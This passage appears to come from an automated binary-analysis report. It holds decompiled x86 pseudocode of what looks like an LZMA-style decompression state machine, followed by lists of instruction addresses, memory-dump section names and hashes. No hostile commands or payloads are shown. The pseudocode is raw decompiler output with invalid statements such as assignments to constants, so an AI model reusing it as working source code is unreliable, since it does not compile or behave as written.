                              												__ebx = __ebx + __ebx;
                              												 *__esi = __cx;
                              											}
                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                              											 *(__ebp - 0x44) = __ebx;
                              											if( *(__ebp - 0x10) >= 0x1000000) {
                              												goto L39;
                              											} else {
                              												goto L37;
                              											}
                              										case 0xe:
                              											L46:
                              											__eflags =  *(__ebp - 0x6c);
                              											if( *(__ebp - 0x6c) == 0) {
                              												 *(__ebp - 0x88) = 0xe;
                              												goto L170;
                              											}
                              											__ecx =  *(__ebp - 0x70);
                              											__eax =  *(__ebp - 0xc);
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											_t156 = __ebp - 0x70;
                              											 *_t156 =  *(__ebp - 0x70) + 1;
                              											__eflags =  *_t156;
                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											while(1) {
                              												L48:
                              												__eflags = __ebx - 0x100;
                              												if(__ebx >= 0x100) {
                              													break;
                              												}
                              												__eax =  *(__ebp - 0x58);
                              												__edx = __ebx + __ebx;
                              												__ecx =  *(__ebp - 0x10);
                              												__esi = __edx + __eax;
                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                              												__ax =  *__esi;
                              												 *(__ebp - 0x54) = __esi;
                              												__edi = __ax & 0x0000ffff;
                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                              												__eflags =  *(__ebp - 0xc) - __ecx;
                              												if( *(__ebp - 0xc) >= __ecx) {
                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              													__cx = __ax;
                              													_t170 = __edx + 1; // 0x1
                              													__ebx = _t170;
                              													__cx = __ax >> 5;
                              													__eflags = __eax;
                              													 *__esi = __ax;
                              												} else {
                              													 *(__ebp - 0x10) = __ecx;
                              													0x800 = 0x800 - __edi;
                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              													__ebx = __ebx + __ebx;
                              													 *__esi = __cx;
                              												}
                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                              												 *(__ebp - 0x44) = __ebx;
                              												if( *(__ebp - 0x10) >= 0x1000000) {
                              													continue;
                              												} else {
                              													goto L46;
                              												}
                              											}
                              											L54:
                              											_t173 = __ebp - 0x34;
                              											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                              											__eflags =  *_t173;
                              											goto L55;
                              										case 0xf:
                              											L58:
                              											__eflags =  *(__ebp - 0x6c);
                              											if( *(__ebp - 0x6c) == 0) {
                              												 *(__ebp - 0x88) = 0xf;
                              												goto L170;
                              											}
                              											__ecx =  *(__ebp - 0x70);
                              											__eax =  *(__ebp - 0xc);
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											_t203 = __ebp - 0x70;
                              											 *_t203 =  *(__ebp - 0x70) + 1;
                              											__eflags =  *_t203;
                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											L60:
                              											__eflags = __ebx - 0x100;
                              											if(__ebx >= 0x100) {
                              												L55:
                              												__al =  *(__ebp - 0x44);
                              												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                              												goto L56;
                              											}
                              											L61:
                              											__eax =  *(__ebp - 0x58);
                              											__edx = __ebx + __ebx;
                              											__ecx =  *(__ebp - 0x10);
                              											__esi = __edx + __eax;
                              											__ecx =  *(__ebp - 0x10) >> 0xb;
                              											__ax =  *__esi;
                              											 *(__ebp - 0x54) = __esi;
                              											__edi = __ax & 0x0000ffff;
                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                              											__eflags =  *(__ebp - 0xc) - __ecx;
                              											if( *(__ebp - 0xc) >= __ecx) {
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              												__cx = __ax;
                              												_t217 = __edx + 1; // 0x1
                              												__ebx = _t217;
                              												__cx = __ax >> 5;
                              												__eflags = __eax;
                              												 *__esi = __ax;
                              											} else {
                              												 *(__ebp - 0x10) = __ecx;
                              												0x800 = 0x800 - __edi;
                              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              												__ebx = __ebx + __ebx;
                              												 *__esi = __cx;
                              											}
                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                              											 *(__ebp - 0x44) = __ebx;
                              											if( *(__ebp - 0x10) >= 0x1000000) {
                              												goto L60;
                              											} else {
                              												goto L58;
                              											}
                              										case 0x10:
                              											L109:
                              											__eflags =  *(__ebp - 0x6c);
                              											if( *(__ebp - 0x6c) == 0) {
                              												 *(__ebp - 0x88) = 0x10;
                              												goto L170;
                              											}
                              											__ecx =  *(__ebp - 0x70);
                              											__eax =  *(__ebp - 0xc);
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											_t365 = __ebp - 0x70;
                              											 *_t365 =  *(__ebp - 0x70) + 1;
                              											__eflags =  *_t365;
                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											goto L111;
                              										case 0x11:
                              											L69:
                              											__esi =  *(__ebp - 0x58);
                              											 *(__ebp - 0x84) = 0x12;
                              											while(1) {
                              												 *(_t613 - 0x54) = _t606;
                              												goto L133;
                              											}
                              										case 0x12:
                              											__eflags =  *(__ebp - 0x40);
                              											if( *(__ebp - 0x40) != 0) {
                              												__eax =  *(__ebp - 0x58);
                              												 *(__ebp - 0x84) = 0x13;
                              												__esi =  *(__ebp - 0x58) + 2;
                              												while(1) {
                              													 *(_t613 - 0x54) = _t606;
                              													goto L133;
                              												}
                              											}
                              											__eax =  *(__ebp - 0x4c);
                              											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                              											__ecx =  *(__ebp - 0x58);
                              											__eax =  *(__ebp - 0x4c) << 4;
                              											__eflags = __eax;
                              											__eax =  *(__ebp - 0x58) + __eax + 4;
                              											goto L130;
                              										case 0x13:
                              											__eflags =  *(__ebp - 0x40);
                              											if( *(__ebp - 0x40) != 0) {
                              												_t469 = __ebp - 0x58;
                              												 *_t469 =  *(__ebp - 0x58) + 0x204;
                              												__eflags =  *_t469;
                              												 *(__ebp - 0x30) = 0x10;
                              												 *(__ebp - 0x40) = 8;
                              												L144:
                              												 *(__ebp - 0x7c) = 0x14;
                              												goto L145;
                              											}
                              											__eax =  *(__ebp - 0x4c);
                              											__ecx =  *(__ebp - 0x58);
                              											__eax =  *(__ebp - 0x4c) << 4;
                              											 *(__ebp - 0x30) = 8;
                              											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                              											L130:
                              											 *(__ebp - 0x58) = __eax;
                              											 *(__ebp - 0x40) = 3;
                              											goto L144;
                              										case 0x14:
                              											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                              											__eax =  *(__ebp - 0x80);
                              											 *(_t613 - 0x88) = _t533;
                              											goto L1;
                              										case 0x15:
                              											__eax = 0;
                              											__eflags =  *(__ebp - 0x38) - 7;
                              											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                              											__al = __al & 0x000000fd;
                              											__eax = (__eflags >= 0) - 1 + 0xb;
                              											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                              											goto L120;
                              										case 0x16:
                              											__eax =  *(__ebp - 0x30);
                              											__eflags = __eax - 4;
                              											if(__eax >= 4) {
                              												_push(3);
                              												_pop(__eax);
                              											}
                              											__ecx =  *(__ebp - 4);
                              											 *(__ebp - 0x40) = 6;
                              											__eax = __eax << 7;
                              											 *(__ebp - 0x7c) = 0x19;
                              											 *(__ebp - 0x58) = __eax;
                              											goto L145;
                              										case 0x17:
                              											L145:
                              											__eax =  *(__ebp - 0x40);
                              											 *(__ebp - 0x50) = 1;
                              											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                              											goto L149;
                              										case 0x18:
                              											L146:
                              											__eflags =  *(__ebp - 0x6c);
                              											if( *(__ebp - 0x6c) == 0) {
                              												 *(__ebp - 0x88) = 0x18;
                              												goto L170;
                              											}
                              											__ecx =  *(__ebp - 0x70);
                              											__eax =  *(__ebp - 0xc);
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											_t484 = __ebp - 0x70;
                              											 *_t484 =  *(__ebp - 0x70) + 1;
                              											__eflags =  *_t484;
                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											L148:
                              											_t487 = __ebp - 0x48;
                              											 *_t487 =  *(__ebp - 0x48) - 1;
                              											__eflags =  *_t487;
                              											L149:
                              											__eflags =  *(__ebp - 0x48);
                              											if( *(__ebp - 0x48) <= 0) {
                              												__ecx =  *(__ebp - 0x40);
                              												__ebx =  *(__ebp - 0x50);
                              												0 = 1;
                              												__eax = 1 << __cl;
                              												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                              												__eax =  *(__ebp - 0x7c);
                              												 *(__ebp - 0x44) = __ebx;
                              												while(1) {
                              													 *(_t613 - 0x88) = _t533;
                              													goto L1;
                              												}
                              											}
                              											__eax =  *(__ebp - 0x50);
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                              											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                              											__eax =  *(__ebp - 0x58);
                              											__esi = __edx + __eax;
                              											 *(__ebp - 0x54) = __esi;
                              											__ax =  *__esi;
                              											__edi = __ax & 0x0000ffff;
                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                              											__eflags =  *(__ebp - 0xc) - __ecx;
                              											if( *(__ebp - 0xc) >= __ecx) {
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              												__cx = __ax;
                              												__cx = __ax >> 5;
                              												__eax = __eax - __ecx;
                              												__edx = __edx + 1;
                              												__eflags = __edx;
                              												 *__esi = __ax;
                              												 *(__ebp - 0x50) = __edx;
                              											} else {
                              												 *(__ebp - 0x10) = __ecx;
                              												0x800 = 0x800 - __edi;
                              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                              												 *__esi = __cx;
                              											}
                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                              											if( *(__ebp - 0x10) >= 0x1000000) {
                              												goto L148;
                              											} else {
                              												goto L146;
                              											}
                              										case 0x19:
                              											__eflags = __ebx - 4;
                              											if(__ebx < 4) {
                              												 *(__ebp - 0x2c) = __ebx;
                              												L119:
                              												_t393 = __ebp - 0x2c;
                              												 *_t393 =  *(__ebp - 0x2c) + 1;
                              												__eflags =  *_t393;
                              												L120:
                              												__eax =  *(__ebp - 0x2c);
                              												__eflags = __eax;
                              												if(__eax == 0) {
                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                              													goto L170;
                              												}
                              												__eflags = __eax -  *(__ebp - 0x60);
                              												if(__eax >  *(__ebp - 0x60)) {
                              													goto L171;
                              												}
                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                              												__eax =  *(__ebp - 0x30);
                              												_t400 = __ebp - 0x60;
                              												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                              												__eflags =  *_t400;
                              												goto L123;
                              											}
                              											__ecx = __ebx;
                              											__eax = __ebx;
                              											__ecx = __ebx >> 1;
                              											__eax = __ebx & 0x00000001;
                              											__ecx = (__ebx >> 1) - 1;
                              											__al = __al | 0x00000002;
                              											__eax = (__ebx & 0x00000001) << __cl;
                              											__eflags = __ebx - 0xe;
                              											 *(__ebp - 0x2c) = __eax;
                              											if(__ebx >= 0xe) {
                              												__ebx = 0;
                              												 *(__ebp - 0x48) = __ecx;
                              												L102:
                              												__eflags =  *(__ebp - 0x48);
                              												if( *(__ebp - 0x48) <= 0) {
                              													__eax = __eax + __ebx;
                              													 *(__ebp - 0x40) = 4;
                              													 *(__ebp - 0x2c) = __eax;
                              													__eax =  *(__ebp - 4);
                              													__eax =  *(__ebp - 4) + 0x644;
                              													__eflags = __eax;
                              													L108:
                              													__ebx = 0;
                              													 *(__ebp - 0x58) = __eax;
                              													 *(__ebp - 0x50) = 1;
                              													 *(__ebp - 0x44) = 0;
                              													 *(__ebp - 0x48) = 0;
                              													L112:
                              													__eax =  *(__ebp - 0x40);
                              													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                              													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                              														_t391 = __ebp - 0x2c;
                              														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                              														__eflags =  *_t391;
                              														goto L119;
                              													}
                              													__eax =  *(__ebp - 0x50);
                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                              													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                              													__eax =  *(__ebp - 0x58);
                              													__esi = __edi + __eax;
                              													 *(__ebp - 0x54) = __esi;
                              													__ax =  *__esi;
                              													__ecx = __ax & 0x0000ffff;
                              													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                              													__eflags =  *(__ebp - 0xc) - __edx;
                              													if( *(__ebp - 0xc) >= __edx) {
                              														__ecx = 0;
                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                              														__ecx = 1;
                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                              														__ebx = 1;
                              														__ecx =  *(__ebp - 0x48);
                              														__ebx = 1 << __cl;
                              														__ecx = 1 << __cl;
                              														__ebx =  *(__ebp - 0x44);
                              														__ebx =  *(__ebp - 0x44) | __ecx;
                              														__cx = __ax;
                              														__cx = __ax >> 5;
                              														__eax = __eax - __ecx;
                              														__edi = __edi + 1;
                              														__eflags = __edi;
                              														 *(__ebp - 0x44) = __ebx;
                              														 *__esi = __ax;
                              														 *(__ebp - 0x50) = __edi;
                              													} else {
                              														 *(__ebp - 0x10) = __edx;
                              														0x800 = 0x800 - __ecx;
                              														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                              														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                              														 *__esi = __dx;
                              													}
                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                              													if( *(__ebp - 0x10) >= 0x1000000) {
                              														L111:
                              														_t368 = __ebp - 0x48;
                              														 *_t368 =  *(__ebp - 0x48) + 1;
                              														__eflags =  *_t368;
                              														goto L112;
                              													} else {
                              														goto L109;
                              													}
                              												}
                              												__ecx =  *(__ebp - 0xc);
                              												__ebx = __ebx + __ebx;
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                              												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                              												 *(__ebp - 0x44) = __ebx;
                              												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                              													__ecx =  *(__ebp - 0x10);
                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                              													__ebx = __ebx | 0x00000001;
                              													__eflags = __ebx;
                              													 *(__ebp - 0x44) = __ebx;
                              												}
                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                              												if( *(__ebp - 0x10) >= 0x1000000) {
                              													L101:
                              													_t338 = __ebp - 0x48;
                              													 *_t338 =  *(__ebp - 0x48) - 1;
                              													__eflags =  *_t338;
                              													goto L102;
                              												} else {
                              													goto L99;
                              												}
                              											}
                              											__edx =  *(__ebp - 4);
                              											__eax = __eax - __ebx;
                              											 *(__ebp - 0x40) = __ecx;
                              											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                              											goto L108;
                              										case 0x1a:
                              											L56:
                              											__eflags =  *(__ebp - 0x64);
                              											if( *(__ebp - 0x64) == 0) {
                              												 *(__ebp - 0x88) = 0x1a;
                              												goto L170;
                              											}
                              											__ecx =  *(__ebp - 0x68);
                              											__al =  *(__ebp - 0x5c);
                              											__edx =  *(__ebp - 8);
                              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                              											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                              											 *( *(__ebp - 0x68)) = __al;
                              											__ecx =  *(__ebp - 0x14);
                              											 *(__ecx +  *(__ebp - 8)) = __al;
                              											__eax = __ecx + 1;
                              											__edx = 0;
                              											_t192 = __eax %  *(__ebp - 0x74);
                              											__eax = __eax /  *(__ebp - 0x74);
                              											__edx = _t192;
                              											goto L79;
                              										case 0x1b:
                              											L75:
                              											__eflags =  *(__ebp - 0x64);
                              											if( *(__ebp - 0x64) == 0) {
                              												 *(__ebp - 0x88) = 0x1b;
                              												goto L170;
                              											}
                              											__eax =  *(__ebp - 0x14);
                              											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              											__eflags = __eax -  *(__ebp - 0x74);
                              											if(__eax >=  *(__ebp - 0x74)) {
                              												__eax = __eax +  *(__ebp - 0x74);
                              												__eflags = __eax;
                              											}
                              											__edx =  *(__ebp - 8);
                              											__cl =  *(__eax + __edx);
                              											__eax =  *(__ebp - 0x14);
                              											 *(__ebp - 0x5c) = __cl;
                              											 *(__eax + __edx) = __cl;
                              											__eax = __eax + 1;
                              											__edx = 0;
                              											_t274 = __eax %  *(__ebp - 0x74);
                              											__eax = __eax /  *(__ebp - 0x74);
                              											__edx = _t274;
                              											__eax =  *(__ebp - 0x68);
                              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                              											_t283 = __ebp - 0x64;
                              											 *_t283 =  *(__ebp - 0x64) - 1;
                              											__eflags =  *_t283;
                              											 *( *(__ebp - 0x68)) = __cl;
                              											L79:
                              											 *(__ebp - 0x14) = __edx;
                              											goto L80;
                              										case 0x1c:
                              											while(1) {
                              												L123:
                              												__eflags =  *(__ebp - 0x64);
                              												if( *(__ebp - 0x64) == 0) {
                              													break;
                              												}
                              												__eax =  *(__ebp - 0x14);
                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              												__eflags = __eax -  *(__ebp - 0x74);
                              												if(__eax >=  *(__ebp - 0x74)) {
                              													__eax = __eax +  *(__ebp - 0x74);
                              													__eflags = __eax;
                              												}
                              												__edx =  *(__ebp - 8);
                              												__cl =  *(__eax + __edx);
                              												__eax =  *(__ebp - 0x14);
                              												 *(__ebp - 0x5c) = __cl;
                              												 *(__eax + __edx) = __cl;
                              												__eax = __eax + 1;
                              												__edx = 0;
                              												_t414 = __eax %  *(__ebp - 0x74);
                              												__eax = __eax /  *(__ebp - 0x74);
                              												__edx = _t414;
                              												__eax =  *(__ebp - 0x68);
                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                              												__eflags =  *(__ebp - 0x30);
                              												 *( *(__ebp - 0x68)) = __cl;
                              												 *(__ebp - 0x14) = _t414;
                              												if( *(__ebp - 0x30) > 0) {
                              													continue;
                              												} else {
                              													L80:
                              													 *(__ebp - 0x88) = 2;
                              													goto L1;
                              												}
                              											}
                              											 *(__ebp - 0x88) = 0x1c;
                              											goto L170;
                              									}
                              								}
                              								L171:
                              								_t535 = _t534 | 0xffffffff;
                              								goto L172;
                              							}
                              						}
                              					}
                              				}
                              			}













                              0x00406ba4
                              0x00406ba7
                              0x00406ba7
                              0x00406baa
                              0x00406bae
                              0x00406bb0
                              0x00406b88
                              0x00406b88
                              0x00406b90
                              0x00406b95
                              0x00406b97
                              0x00406b99
                              0x00406b99
                              0x00406bb3
                              0x00406bba
                              0x00406bbd
                              0x00000000
                              0x00406bbf
                              0x00000000
                              0x00406bbf
                              0x00000000
                              0x00406e4c
                              0x00406e4c
                              0x00406e50
                              0x00407177
                              0x00000000
                              0x00407177
                              0x00406e56
                              0x00406e59
                              0x00406e5c
                              0x00406e60
                              0x00406e63
                              0x00406e69
                              0x00406e6b
                              0x00406e6b
                              0x00406e6b
                              0x00406e6e
                              0x00000000
                              0x00000000
                              0x00406c1c
                              0x00406c1c
                              0x00406c1f
                              0x00406f91
                              0x00406f91
                              0x00000000
                              0x00406f91
                              0x00000000
                              0x00406f5b
                              0x00406f5f
                              0x00406f81
                              0x00406f84
                              0x00406f8e
                              0x00406f91
                              0x00406f91
                              0x00000000
                              0x00406f91
                              0x00406f91
                              0x00406f61
                              0x00406f64
                              0x00406f68
                              0x00406f6b
                              0x00406f6b
                              0x00406f6e
                              0x00000000
                              0x00000000
                              0x00407018
                              0x0040701c
                              0x0040703a
                              0x0040703a
                              0x0040703a
                              0x00407041
                              0x00407048
                              0x0040704f
                              0x0040704f
                              0x00000000
                              0x0040704f
                              0x0040701e
                              0x00407021
                              0x00407024
                              0x00407027
                              0x0040702e
                              0x00406f72
                              0x00406f72
                              0x00406f75
                              0x00000000
                              0x00000000
                              0x00407109
                              0x0040710c
                              0x0040700d
                              0x00000000
                              0x00000000
                              0x00406d43
                              0x00406d45
                              0x00406d4c
                              0x00406d4d
                              0x00406d4f
                              0x00406d52
                              0x00000000
                              0x00000000
                              0x00406d5a
                              0x00406d5d
                              0x00406d60
                              0x00406d62
                              0x00406d64
                              0x00406d64
                              0x00406d65
                              0x00406d68
                              0x00406d6f
                              0x00406d72
                              0x00406d80
                              0x00000000
                              0x00000000
                              0x00407056
                              0x00407056
                              0x00407059
                              0x00407060
                              0x00000000
                              0x00000000
                              0x00407065
                              0x00407065
                              0x00407069
                              0x004071a1
                              0x00000000
                              0x004071a1
                              0x0040706f
                              0x00407072
                              0x00407075
                              0x00407079
                              0x0040707c
                              0x00407082
                              0x00407084
                              0x00407084
                              0x00407084
                              0x00407087
                              0x0040708a
                              0x0040708a
                              0x0040708a
                              0x0040708a
                              0x0040708d
                              0x0040708d
                              0x00407091
                              0x004070f1
                              0x004070f4
                              0x004070f9
                              0x004070fa
                              0x004070fc
                              0x004070fe
                              0x00407101
                              0x0040700d
                              0x0040700d
                              0x00000000
                              0x00407013
                              0x0040700d
                              0x00407093
                              0x00407099
                              0x0040709c
                              0x0040709f
                              0x004070a2
                              0x004070a5
                              0x004070a8
                              0x004070ab
                              0x004070ae
                              0x004070b1
                              0x004070b4
                              0x004070cd
                              0x004070d0
                              0x004070d3
                              0x004070d6
                              0x004070da
                              0x004070dc
                              0x004070dc
                              0x004070dd
                              0x004070e0
                              0x004070b6
                              0x004070b6
                              0x004070be
                              0x004070c3
                              0x004070c5
                              0x004070c8
                              0x004070c8
                              0x004070e3
                              0x004070ea
                              0x00000000
                              0x004070ec
                              0x00000000
                              0x004070ec
                              0x00000000
                              0x00406d88
                              0x00406d8b
                              0x00406dc1
                              0x00406ef1
                              0x00406ef1
                              0x00406ef1
                              0x00406ef1
                              0x00406ef4
                              0x00406ef4
                              0x00406ef7
                              0x00406ef9
                              0x00407183
                              0x00000000
                              0x00407183
                              0x00406eff
                              0x00406f02
                              0x00000000
                              0x00000000
                              0x00406f08
                              0x00406f0c
                              0x00406f0f
                              0x00406f0f
                              0x00406f0f
                              0x00000000
                              0x00406f0f
                              0x00406d8d
                              0x00406d8f
                              0x00406d91
                              0x00406d93
                              0x00406d96
                              0x00406d97
                              0x00406d99
                              0x00406d9b
                              0x00406d9e
                              0x00406da1
                              0x00406db7
                              0x00406dbc
                              0x00406df4
                              0x00406df4
                              0x00406df8
                              0x00406e24
                              0x00406e26
                              0x00406e2d
                              0x00406e30
                              0x00406e33
                              0x00406e33
                              0x00406e38
                              0x00406e38
                              0x00406e3a
                              0x00406e3d
                              0x00406e44
                              0x00406e47
                              0x00406e74
                              0x00406e74
                              0x00406e77
                              0x00406e7a
                              0x00406eee
                              0x00406eee
                              0x00406eee
                              0x00000000
                              0x00406eee
                              0x00406e7c
                              0x00406e82
                              0x00406e85
                              0x00406e88
                              0x00406e8b
                              0x00406e8e
                              0x00406e91
                              0x00406e94
                              0x00406e97
                              0x00406e9a
                              0x00406e9d
                              0x00406eb6
                              0x00406eb8
                              0x00406ebb
                              0x00406ebc
                              0x00406ebf
                              0x00406ec1
                              0x00406ec4
                              0x00406ec6
                              0x00406ec8
                              0x00406ecb
                              0x00406ecd
                              0x00406ed0
                              0x00406ed4
                              0x00406ed6
                              0x00406ed6
                              0x00406ed7
                              0x00406eda
                              0x00406edd
                              0x00406e9f
                              0x00406e9f
                              0x00406ea7
                              0x00406eac
                              0x00406eae
                              0x00406eb1
                              0x00406eb1
                              0x00406ee0
                              0x00406ee7
                              0x00406e71
                              0x00406e71
                              0x00406e71
                              0x00406e71
                              0x00000000
                              0x00406ee9
                              0x00000000
                              0x00406ee9
                              0x00406ee7
                              0x00406dfa
                              0x00406dfd
                              0x00406dff
                              0x00406e02
                              0x00406e05
                              0x00406e08
                              0x00406e0a
                              0x00406e0d
                              0x00406e10
                              0x00406e10
                              0x00406e13
                              0x00406e13
                              0x00406e16
                              0x00406e1d
                              0x00406df1
                              0x00406df1
                              0x00406df1
                              0x00406df1
                              0x00000000
                              0x00406e1f
                              0x00000000
                              0x00406e1f
                              0x00406e1d
                              0x00406da3
                              0x00406da6
                              0x00406da8
                              0x00406dab
                              0x00000000
                              0x00000000
                              0x00406b0a
                              0x00406b0a
                              0x00406b0e
                              0x00407153
                              0x00000000
                              0x00407153
                              0x00406b14
                              0x00406b17
                              0x00406b1a
                              0x00406b1d
                              0x00406b20
                              0x00406b23
                              0x00406b26
                              0x00406b28
                              0x00406b2b
                              0x00406b2e
                              0x00406b31
                              0x00406b33
                              0x00406b33
                              0x00406b33
                              0x00000000
                              0x00000000
                              0x00406c95
                              0x00406c95
                              0x00406c99
                              0x0040715f
                              0x00000000
                              0x0040715f
                              0x00406c9f
                              0x00406ca2
                              0x00406ca5
                              0x00406ca8
                              0x00406caa
                              0x00406caa
                              0x00406caa
                              0x00406cad
                              0x00406cb0
                              0x00406cb3
                              0x00406cb6
                              0x00406cb9
                              0x00406cbc
                              0x00406cbd
                              0x00406cbf
                              0x00406cbf
                              0x00406cbf
                              0x00406cc2
                              0x00406cc5
                              0x00406cc8
                              0x00406ccb
                              0x00406ccb
                              0x00406ccb
                              0x00406cce
                              0x00406cd0
                              0x00406cd0
                              0x00000000
                              0x00000000
                              0x00406f12
                              0x00406f12
                              0x00406f12
                              0x00406f16
                              0x00000000
                              0x00000000
                              0x00406f1c
                              0x00406f1f
                              0x00406f22
                              0x00406f25
                              0x00406f27
                              0x00406f27
                              0x00406f27
                              0x00406f2a
                              0x00406f2d
                              0x00406f30
                              0x00406f33
                              0x00406f36
                              0x00406f39
                              0x00406f3a
                              0x00406f3c
                              0x00406f3c
                              0x00406f3c
                              0x00406f3f
                              0x00406f42
                              0x00406f45
                              0x00406f48
                              0x00406f4b
                              0x00406f4f
                              0x00406f51
                              0x00406f54
                              0x00000000
                              0x00406f56
                              0x00406cd3
                              0x00406cd3
                              0x00000000
                              0x00406cd3
                              0x00406f54
                              0x00407189
                              0x00000000
                              0x00000000
                              0x004067b8
                              0x004071c0
                              0x004071c0
                              0x00000000
                              0x004071c0
                              0x0040700d
                              0x00406f94
                              0x00406f91

                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e1b0e058f0407479a5b4db29d08bd0827f70999cda66fb763b614c0a8a1c0f1e
                              • Instruction ID: 903876060ddd0b56a19be001448e640a61514b7b9d13fdc5f9f4a1faaeb2382a
                              • Opcode Fuzzy Hash: e1b0e058f0407479a5b4db29d08bd0827f70999cda66fb763b614c0a8a1c0f1e
